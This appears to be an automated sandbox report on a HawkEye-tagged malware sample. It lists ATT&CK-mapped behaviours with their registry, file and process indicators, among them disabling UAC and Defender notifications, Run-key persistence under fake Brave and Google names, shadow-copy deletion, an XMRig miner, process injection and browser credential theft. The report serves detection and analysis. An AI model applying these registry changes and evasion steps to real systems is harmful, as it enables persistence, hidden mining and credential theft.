hawkeye | 9f95bbe3fb28e4c290e869b40ae20dcd9db64071cda11a77a9313c0e13b55518

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	powershell.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	powershell.exe

UAC bypass 3 TTPs 4 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/4400-3961-0x00007FF6C68E0000-0x00007FF6C7E9A000-memory.dmp	xmrig
behavioral1/memory/5000-3979-0x00007FF6C68E0000-0x00007FF6C7E9A000-memory.dmp	xmrig

Adds policy Run key to start application 2 TTPs 6 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	BraveSharedUpdater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	BraveSharedUpdater.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	iexplore.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3125	848	powershell.exe

Contacts a large (1448) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\DRIVERS\SETC2D3.tmp	RUNDLL32.EXE
File opened for modification	C:\Windows\system32\DRIVERS\stflt.sys	RUNDLL32.EXE
File opened for modification	C:\Windows\system32\DRIVERS\SETC2D3.tmp	RUNDLL32.EXE

A potential corporate email address has been identified in the URL: [email protected]
phishing
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Adds Run key to start application 2 TTPs 22 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleCrashHandler = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleCrashHandler.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleCrashHandler64 = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleCrashHandler64.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	BraveSharedUpdater.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\ProgramData\\BraveCrashHandler.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleCrashHandler = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleCrashHandler.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	BraveSharedUpdater.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\Users\\Admin\\Embedit.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SheIlExperienceHost = "C:\\Users\\Admin\\AppData\\Local\\SheIlExperienceHost.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpywareTerminatorShield = "C:\\Program Files (x86)\\Spyware Terminator\\SpywareTerminatorShield.exe"	SpywareTerminator.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpywareTerminatorShield = "C:\\Program Files (x86)\\Spyware Terminator\\SpywareTerminatorShield.exe"	SpywareTerminator.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\Users\\Admin\\Embedit.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SheIlExperienceHost = "C:\\Users\\Admin\\AppData\\Local\\SheIlExperienceHost.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpywareTerminatorUpdater = "C:\\Program Files (x86)\\Spyware Terminator\\SpywareTerminatorUpdate.exe"	SpywareTerminator.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\ProgramData\\BraveCrashHandler.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\""	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleCrashHandler64 = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleCrashHandler64.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpywareTerminatorShield = "C:\\Program Files (x86)\\Spyware Terminator\\SpywareTerminatorShield.exe"	SpywareTerminator.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpywareTerminatorUpdater = "C:\\Program Files (x86)\\Spyware Terminator\\SpywareTerminatorUpdate.exe"	SpywareTerminator.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpywareTerminatorUpdater = "C:\\Program Files (x86)\\Spyware Terminator\\SpywareTerminatorUpdate.exe"	SpywareTerminator.exe

Downloads MZ/PE file

Installs/modifies Browser Helper Object 2 TTPs 6 IoCs

BHOs are DLL modules which act as plugins for Internet Explorer.

stealer adware

Modify Registry

Browser Extensions

T1176

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{82A76710-4F98-4957-92BE-99648A4E2475}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{82A76710-4F98-4957-92BE-99648A4E2475}\	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{82A76710-4F98-4957-92BE-99648A4E2475}\NoExplorer = "1"	regsvr32.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{82A76710-4F98-4957-92BE-99648A4E2475}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{82A76710-4F98-4957-92BE-99648A4E2475}\	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{82A76710-4F98-4957-92BE-99648A4E2475}\NoExplorer = "1"	regsvr32.exe

Power Settings 1 TTPs 2 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

Power Settings

T1653

pid	Process
5584	powercfg.exe
5708	powercfg.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5480	2344	WerFault.exe	289

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	SpywareTerminator.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	SpywareTerminatorShield.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	SpywareTerminator.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	SpywareTerminator.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	SpywareTerminator.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	SpywareTerminatorSetup.tmp

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_adeb6424513f60a2\input.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF	dxdiag.exe
File created	C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_b748590104fe1c15\machine.PNF	dxdiag.exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
1476	tasklist.exe
4424	tasklist.exe
3976	tasklist.exe
1708	tasklist.exe
4504	tasklist.exe
3752	tasklist.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs

pid	Process
1076	BraveCrashHandler.exe
1076	BraveCrashHandler.exe
1076	BraveCrashHandler.exe
1076	BraveCrashHandler.exe
1076	BraveCrashHandler.exe
1076	BraveCrashHandler.exe
1076	BraveCrashHandler.exe
1164	Embedit.exe
1164	Embedit.exe
1076	BraveCrashHandler.exe
1164	Embedit.exe
4432	GoogleCrashHandler.exe
4432	GoogleCrashHandler.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1084 set thread context of 4300	1084	Setup.exe	258
PID 2648 set thread context of 1424	2648	Setup.exe	266
PID 3772 set thread context of 2344	3772	BraveSharedUpdater.exe	289
PID 2344 set thread context of 4736	2344	iexplore.exe	292

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 36 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Spyware Terminator\is-ABI25.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\is-AGLVN.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\is-7PDO7.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-LA7QJ.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-V57N4.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-I1234.tmp	SpywareTerminatorSetup.tmp
File opened for modification	C:\Program Files (x86)\Spyware Terminator\unins000.dat	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\unins000.dat	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\is-7N4C0.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-B4B92.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\is-CC66M.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Driver\driver.cab	st_rsser64.exe
File created	C:\Program Files (x86)\Spyware Terminator\com.spywareterminator.internetguard.json	STInternetGuard.exe
File opened for modification	C:\Program Files (x86)\Spyware Terminator\Driver\stflt.inf	st_rsser64.exe
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-J2HNC.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-VQD8U.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-QELN3.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-S4PAC.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-6H3VM.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-9NMLK.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\is-2ABCI.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\is-U6RNN.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\is-VCIL0.tmp	SpywareTerminatorSetup.tmp
File opened for modification	C:\Program Files (x86)\Spyware Terminator\Driver\stflt.sys	st_rsser64.exe
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-RBFK3.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\is-608EF.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-UTIBB.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-93CD3.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-GRDFG.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-SFTTG.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\is-N391K.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\Tools\is-BCGS3.tmp	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\unins000.msg	SpywareTerminatorSetup.tmp
File created	C:\Program Files (x86)\Spyware Terminator\TorrentDll.dll	SpywareTerminatorUpdate.exe
File created	C:\Program Files (x86)\Spyware Terminator\is-0G8J5.tmp	SpywareTerminatorSetup.tmp
File opened for modification	C:\Program Files (x86)\Spyware Terminator\Driver\stflt.cat	st_rsser64.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	dismhost.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe

Executes dropped EXE 33 IoCs

pid	Process
2340	SpywareTerminatorSetup.tmp
3768	SpywareTerminator.exe
812	st_rsser64.exe
4884	STInternetGuard.exe
4676	SpywareTerminator.exe
5052	SpywareTerminatorUpdate.exe
692	SpywareTerminatorShield.exe
1736	SpywareTerminatorUpdate.exe
5040	SpywareTerminator.exe
5056	SpywareTerminator.exe
760	SpywareTerminator.exe
4880	SpywareTerminatorUpdate.exe
5100	SpywareTerminatorUpdate.exe
4484	SpywareTerminatorUpdate.exe
4116	SpywareTerminator.exe
3636	SpywareTerminator.exe
4184	SpywareTerminatorUpdate.exe
3824	analyzefile.exe
1508	SpywareTerminator.exe
2240	SpywareTerminator.exe
1084	Setup.exe
2536	nc.exe
2648	Setup.exe
1244	nc.exe
2460	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
3772	BraveSharedUpdater.exe
1076	BraveCrashHandler.exe
5872	dismhost.exe
5336	SpywareTerminator.exe
1164	Embedit.exe
3704	dismhost.exe
4432	GoogleCrashHandler.exe
5376	myst-launcher-amd64.exe

Loads dropped DLL 64 IoCs

pid	Process
2620	regsvr32.exe
4112	regsvr32.exe
4112	regsvr32.exe
4404	regsvr32.exe
1952	regsvr32.exe
3648	regsvr32.exe
760	regsvr32.exe
3288	regsvr32.exe
2344	regsvr32.exe
5052	SpywareTerminatorUpdate.exe
3528	Process not Found
3528	Process not Found
1084	Setup.exe
1084	Setup.exe
1084	Setup.exe
1084	Setup.exe
2648	Setup.exe
2648	Setup.exe
2648	Setup.exe
2648	Setup.exe
2648	Setup.exe
1524	AutoIt3.exe
2948	AutoIt3.exe
2460	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
2460	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
5872	dismhost.exe
2344	iexplore.exe
2344	iexplore.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe
3704	dismhost.exe

Modifies system executable filetype association 2 TTPs 24 IoCs

Modify Registry

Change Default File Association

T1546.001

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}"	regsvr32.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

System Location Discovery: System Language Discovery 1 TTPs 43 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BraveSharedUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iexplore.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dxdiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	STInternetGuard.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AutoIt3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminatorUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	analyzefile.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminatorShield.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminatorUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminatorUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminatorUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminatorSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminatorSetup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AutoIt3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminatorUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SpywareTerminator.exe
